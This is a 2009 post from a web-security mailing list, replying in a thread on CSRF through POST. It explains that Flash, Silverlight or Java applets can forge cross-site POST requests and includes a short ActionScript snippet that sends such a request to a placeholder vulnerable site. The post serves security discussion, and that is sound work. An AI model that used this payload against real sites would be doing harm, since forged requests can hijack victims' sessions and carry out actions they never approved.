WebApp Sec mailing list archives

Re: CSRF through POST

From: YGN Ethical Hacker Group <lists () yehg net>
Date: Sat, 26 Dec 2009 21:55:23 -0800

You can forge HTTP Post using any feasible browser plugins such as
Flash (AS), SilverLight, Java Applet.
Flash is said to be a feasible way to take over victim's sessions via CSRF.


[flash]
var req:LoadVars=new LoadVars();
req.addRequestHeader("Foo","Bar");
req.decode("a=b&c=d");
req.send("http://www.vuln.site/some/page.cgi?p1=v1&p2=v2";,
         "_blank","POST");
[/flash]

http://www.shinedraw.com/data-handling/flash-vs-silverlight-simple-http-post-request/
http://www.securiteam.com/securityreviews/5KP0M1FJ5E.html
http://forums.sun.com/thread.jspa?threadID=645830

-- 
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net



This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now! 
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

Current thread:

CSRF through POST Robin Wood (Dec 15)
- Re: CSRF through POST arvind doraiswamy (Dec 16)
  - Re: CSRF through POST Robin Wood (Dec 16)
    - RE: CSRF through POST boaz.shunami (Dec 21)
    - Re: CSRF through POST chr1x (Dec 21)
    - Re: CSRF through POST Robin Wood (Dec 22)
    - Re: CSRF through POST Amish Shah (Dec 24)
    - Re: CSRF through POST YGN Ethical Hacker Group (Dec 27)
- Re: CSRF through POST Himanshu Goyal (Dec 22)